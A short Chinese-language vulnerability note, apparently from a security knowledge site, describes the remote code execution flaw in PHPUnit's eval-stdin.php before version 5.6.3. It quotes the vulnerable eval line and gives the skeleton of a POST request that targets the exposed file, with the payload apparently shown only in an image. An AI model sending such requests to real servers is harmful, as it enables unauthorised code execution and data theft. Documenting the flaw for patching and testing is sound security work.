menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right PHPUnit eval-stdin.php 远程命令执行漏洞 chevron_right PHPUnit eval-stdin.php 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    PHPUnit eval-stdin.php 远程命令执行漏洞.md
    577 B / 2021-07-15 20:01:37
        # PHPUnit eval-stdin.php 远程命令执行漏洞

## 漏洞描述

PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限。

## 漏洞影响

PHPUnit < 5.6.3

## 漏洞复现

漏洞位于 /phpunit/src/Util/PHP/eval-stdin.php

其中关键代码为:

```
eval('?>'.file_get_contents('php://input'));
```

发送如下请求包执行PHP代码

```
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: 
Content-Length: 21
Accept-Encoding: gzip
```

![php1.png](/resource/PHPUnit/php-1.png)
    links
    file_download